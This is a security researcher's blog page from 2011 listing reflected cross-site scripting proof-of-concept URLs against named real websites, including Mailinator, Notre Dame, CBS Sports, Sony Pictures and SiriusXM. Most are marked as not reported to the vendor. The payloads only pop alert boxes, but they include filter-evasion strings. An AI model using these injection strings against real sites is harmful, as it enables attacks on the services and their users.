This site is my sandbox. I post security vulnerabilities I discover, project updates, and the occasional rant. Comments are usually disabled, but if you need to contact me, I am sure you will find a way to.
29
Dec 11

Mailinator.com

Date: Dec-29-2011
Vendor Notified: No
Proof of Concept:
http://www.mailinator.com/maildir.jsp?email=--></script><script>alert('0');</script>

25
Sep 11

University of Notre Dame

Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://apps.nd.edu/webdirectory/directory.cfm?cn=<script>alert('0');</script>

25
Sep 11

University of Notre Dame WebFile

Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://webfile.nd.edu/~</script><script>alert('0');</script>/apps/webfile

 

Note:
After hitting the URL, go back to the webfile login (https://webfile.nd.edu) and use any dummy login credentials.  Previous XSS will be present and spark an internal server error.

20
Aug 11

CBS Sports

Date: Aug-20-2011
Vendor Notified: No
Proof of Concept:
http://www.cbssports.com/info/search#q=//";//\";//--></script>">'><script>alert(0)</script>

20
Aug 11

AddictingGames

Date: Aug-20-2011
Vendor Notified: No
Proof of Concept:
http://www.addictinggames.com/static/php/game/searchPage.php?pageAction=search&text=%3C/script%3E%3Cscript%3Ealert%280%29;%3C/script%3E

18
Aug 11

TV Guide

Date: Aug-18-2011
Vendor Notified: No
Proof of Concept:
http://www.tvguide.com/search/index.aspx?keyword=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E

18
Aug 11

Sony Pictures

Date: Aug-18-2011
Vendor Notified: No
Proof of Concept:
http://search.sonypictures.com/search?q=%22;alert%280%29//&proxystylesheet=sp-us&site=sp-us

26
Jul 11

MapQuest

Date: Jul-26-2011
Vendor Notified: Yes
Proof of Concept:
http://web.sa.mapquest.com/wendys/advantage.adp?template=en_search_error&postalCode=\%27;alert(0)//

24
Jul 11

SiriusXM Satellite Radio

Date: Jul-24-2011
Vendor Notified: No
Proof of Concept:
http://www.siriusxm.com/servlet/Satellite?c=SXM_Channel_C&childpagename=SXM%2FSXM_Channel_C%2FChannelDetail&cid=--%3E%3Cscript%3Ealert(%270%27);%3C/script%3E&pagename=SXM%2FWrapper

07
May 11

HLTV.org

Date: May-07-2011
Vendor Notified: No
Proof of Concept:
http://www.hltv.org/?pageid=198&search=1&teams=%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

« Older Entries

Copyright © 2012 benburns.org
WordPress, sucka. Theme by Theme Lab